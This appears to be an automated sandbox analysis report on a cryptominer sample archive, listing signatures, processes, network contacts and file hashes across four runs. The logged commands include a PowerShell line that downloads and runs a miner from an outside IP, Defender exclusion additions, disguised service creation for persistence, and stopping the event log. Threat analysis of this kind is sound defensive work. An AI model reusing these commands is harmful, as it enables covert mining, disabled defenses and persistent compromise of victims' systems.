Analysis Overview
SHA256
5777a295a10efd68effe3367a79f27e47622391cd2c8b66c01eaf8045f1e181c
Threat Level: Likely malicious
The file Miners.zip was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Creates new service(s)
Stops running service(s)
Command and Scripting Interpreter: PowerShell
UPX packed file
Checks BIOS information in registry
Themida packer
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 01:39
Signatures
Themida packer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240508-en
Max time kernel
0s
Max time network
19s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\UAC.exe
"C:\Users\Admin\AppData\Local\Temp\UAC.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://46.102.174.48/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1308,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| ZA | 46.102.174.48:80 | | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
Files
memory/2764-0-0x0000000072F4E000-0x0000000072F4F000-memory.dmp
memory/2764-1-0x0000000004EA0000-0x0000000004ED6000-memory.dmp
memory/2764-3-0x0000000072F40000-0x00000000736F0000-memory.dmp
memory/2764-2-0x0000000005550000-0x0000000005B78000-memory.dmp
memory/2764-4-0x0000000072F40000-0x00000000736F0000-memory.dmp
memory/2764-7-0x0000000005E20000-0x0000000005E86000-memory.dmp
memory/2764-17-0x0000000005F90000-0x00000000062E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lb2uovv.cu1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2764-6-0x0000000005DB0000-0x0000000005E16000-memory.dmp
memory/2764-5-0x00000000054B0000-0x00000000054D2000-memory.dmp
memory/2764-18-0x0000000006460000-0x000000000647E000-memory.dmp
memory/2764-19-0x0000000006510000-0x000000000655C000-memory.dmp
memory/2764-41-0x00000000076F0000-0x0000000007793000-memory.dmp
memory/2764-40-0x0000000006A70000-0x0000000006A8E000-memory.dmp
memory/2764-30-0x000000006F830000-0x000000006F87C000-memory.dmp
memory/2764-43-0x00000000077A0000-0x00000000077BA000-memory.dmp
memory/2764-42-0x0000000007E20000-0x000000000849A000-memory.dmp
memory/2764-44-0x0000000007800000-0x000000000780A000-memory.dmp
memory/2764-29-0x0000000006A30000-0x0000000006A62000-memory.dmp
memory/2764-45-0x0000000007A10000-0x0000000007AA6000-memory.dmp
memory/2764-46-0x0000000007990000-0x00000000079A1000-memory.dmp
memory/2764-47-0x00000000079C0000-0x00000000079CE000-memory.dmp
memory/2764-49-0x0000000007AD0000-0x0000000007AEA000-memory.dmp
memory/2764-50-0x0000000007AB0000-0x0000000007AB8000-memory.dmp
memory/2764-48-0x00000000079D0000-0x00000000079E4000-memory.dmp
memory/2764-53-0x0000000072F40000-0x00000000736F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6e440957cb681494b7ad917ecd9616e |
| SHA1 | 0edb2fbd702f145bce506045a8a95800eb0879f1 |
| SHA256 | f4e3c7aa4b570ad8a5d41715de790bb2f84cddc0f84d517aeffafdfce02acfbf |
| SHA512 | d2e5a688a543096662b9759b8f9050909778fbe554ac8e36acc09f2ed7fde9c8f67a23e27c44983a3e75e3dab2fe3cd27da4f55047451571a446a115ea69912c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fbe1aa3f8bdf9d881ee4239f0a312345 |
| SHA1 | d349eddcb4d23cf492e2c2deda377fea30f78322 |
| SHA256 | 7d4348509f354f6485b64c7a8d3b626b30c9e15171e7a07eaa16e5df1c043146 |
| SHA512 | 91f8ed461381d1c1f9896deddb2b7620d9f19eb4cb296e82f6e845e828132f27d0cac7e05190adc71e68b934f744c0841dd981c2dff27a4bd95429dbe76ee415 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240508-en
Max time kernel
15s
Max time network
31s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\miner.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\miner.exe
"C:\Users\Admin\AppData\Local\Temp\miner.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | randomxmonero.auto.nicehash.com | udp |
| US | 34.149.22.228:443 | randomxmonero.auto.nicehash.com | tcp |
| ZA | 46.102.174.48:80 | | tcp |
| US | 8.8.8.8:53 | 228.22.149.34.in-addr.arpa | udp |
Files
memory/2184-0-0x00007FFB42693000-0x00007FFB42695000-memory.dmp
memory/2184-10-0x000002306B8A0000-0x000002306B8C2000-memory.dmp
memory/2184-11-0x00007FFB42690000-0x00007FFB43151000-memory.dmp
memory/2184-12-0x00007FFB42690000-0x00007FFB43151000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqi4cd1s.quy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2184-15-0x00007FFB42690000-0x00007FFB43151000-memory.dmp
memory/1996-26-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1016-41-0x00007FFB21850000-0x00007FFB21860000-memory.dmp
C:\ProgramData\Google\Chrome\updater.exe
| MD5 | 6c8df1dac309514d1cf281d002cba82e |
| SHA1 | 6278823628b689b8cd1a63ddb75f596c10ad79cc |
| SHA256 | d570edf6be963fa52770bbf968f0adde34ae5ed01533817d9a28a04e9b469458 |
| SHA512 | 333145ee62ab3eebdc992d150e8f8b78a7dabcf2c67da8dda22b083826ac55502c32618a6fe08421e0eab274a4660bb8692343a05d2f0c58882631b502f7ae1b |
memory/1016-40-0x000002F360AA0000-0x000002F360ACB000-memory.dmp
C:\ProgramData\Google\Chrome\updater.exe
| MD5 | 2a6e21645cd671e4d7d4c68611258396 |
| SHA1 | 28be0c90f4730d95f314f2d572823ab32d026458 |
| SHA256 | 7945ece0e2807be03347cf07149ddff5a0f0f8891b8709cf9958072f19001d53 |
| SHA512 | 606d8f0b4b329586d91d3444f614a1595fa46bda03f232d336dcbe9e7656a473ccafd8ee06564b4aa8e00dba507c9ff7b3fc68b61c443c766d62e5711783095f |
memory/612-35-0x00007FFB21850000-0x00007FFB21860000-memory.dmp
memory/612-34-0x0000016316880000-0x00000163168AB000-memory.dmp
memory/664-32-0x00007FFB21850000-0x00007FFB21860000-memory.dmp
memory/612-29-0x00000163167E0000-0x0000016316804000-memory.dmp
memory/4688-320-0x000001A3F2900000-0x000001A3F29B5000-memory.dmp
memory/4688-319-0x000001A3F28E0000-0x000001A3F28FC000-memory.dmp
memory/4688-321-0x000001A3F1C10000-0x000001A3F1C1A000-memory.dmp
memory/4688-322-0x000001A3F2B20000-0x000001A3F2B3C000-memory.dmp
memory/664-31-0x000001E9372F0000-0x000001E93731B000-memory.dmp
memory/4688-323-0x000001A3F2B00000-0x000001A3F2B0A000-memory.dmp
memory/4688-325-0x000001A3F2B10000-0x000001A3F2B18000-memory.dmp
memory/4688-327-0x000001A3F2B50000-0x000001A3F2B5A000-memory.dmp
memory/4688-326-0x000001A3F2B40000-0x000001A3F2B46000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
memory/4688-324-0x000001A3F2B60000-0x000001A3F2B7A000-memory.dmp
memory/1996-23-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp
memory/1996-19-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-18-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-17-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-24-0x00007FFB5F820000-0x00007FFB5F8DE000-memory.dmp
memory/1996-22-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1996-20-0x0000000140000000-0x000000014002B000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240426-en
Max time kernel
5s
Max time network
20s
Command Line
Signatures
Creates new service(s)
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\putty.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4536 wrote to memory of 1144 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 4536 wrote to memory of 1144 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "CGMNDIHH"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "CGMNDIHH"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | de-zephyr.miningocean.org | udp |
| DE | 162.19.241.67:5342 | de-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 67.241.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
Files
memory/4692-10-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4464-13-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-18-0x0000000000560000-0x0000000000580000-memory.dmp
memory/4464-22-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-23-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-21-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-19-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-20-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-17-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-15-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-16-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-14-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-11-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-12-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4692-7-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-6-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-5-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-4-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4692-3-0x0000000140000000-0x000000014000D000-memory.dmp
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
| MD5 | 226477a027b7fc61f6f1bfab1bb469e3 |
| SHA1 | fd42239a9149e85e113760b0f9a9a713e08a1522 |
| SHA256 | 2eb6619c54344cd103c43430f87df4cb00cb3fb7fdc62b55e2a113a4ddec58ef |
| SHA512 | da29f76f783d9064d6dc16d79557dc4f1ec5d286506c961bbd23b37f1dde1df4ec7f8817aa0aeccc3cc3ff7990b167a6577d5c823ae87548d30c5a0ffd36dd13 |
memory/4464-26-0x00000000005A0000-0x00000000005C0000-memory.dmp
memory/4464-24-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-27-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-29-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4464-31-0x0000000000FE0000-0x0000000001000000-memory.dmp
memory/4464-32-0x0000000011380000-0x00000000113A0000-memory.dmp
memory/4464-28-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-10 01:34
Reported
2024-06-10 01:43
Platform
win10v2004-20240508-en
Max time kernel
5s
Max time network
32s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Creates new service(s)
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "CGMNDIHH"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "CGMNDIHH"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | de-zephyr.miningocean.org | udp |
| DE | 162.19.241.67:5342 | de-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 67.241.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
Files
memory/2012-1-0x00007FFDCC4D0000-0x00007FFDCC4D2000-memory.dmp
memory/2012-4-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-3-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-2-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-0-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
memory/2012-6-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
| MD5 | c69337e51b250b87b474867376cdb707 |
| SHA1 | 4642f2eb7dfe64b4f934d9829caf4833647c265c |
| SHA256 | ac095c35dc6e044530c4b9024eb8a6ecea122be06dab5b17c1e5fc04b9d342f8 |
| SHA512 | e8c85717f2d47c69ad74eb884d2cb513c9c2c2842e148b406ce634e2b02dcc637122e31a330345310a88c7f8287b3c47b3cbcd7c6e03a73549563d37b220bb09 |
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
| MD5 | 338cb476917c2fdaced336fd8ba5c4b8 |
| SHA1 | bcc7b4ec89555e7eb9aa1ed4724b00b8f490ac0b |
| SHA256 | e4211f8b50df08971e33139ff338e3914e76d81331aaf2a022795d8c443e2d7d |
| SHA512 | aa88e25df77917a0e22b1688a2814712ae5f8f7250b70032ca59a4ea4999ad111113c4ff310786e2a69d0ed6ca6884d8436b60d8eee62c2e080ee7411165e49c |
memory/1380-10-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp
memory/1380-9-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/2560-21-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1376-24-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-29-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-36-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-32-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-35-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-34-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-33-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-31-0x0000000001130000-0x0000000001150000-memory.dmp
memory/1376-30-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-27-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1380-28-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp
memory/1380-26-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/1376-25-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-22-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-23-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1380-13-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/1380-12-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/2560-18-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-17-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-16-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-15-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2560-14-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1380-11-0x00007FF698460000-0x00007FF698F83000-memory.dmp
memory/1376-37-0x0000000140000000-0x0000000140848000-memory.dmp
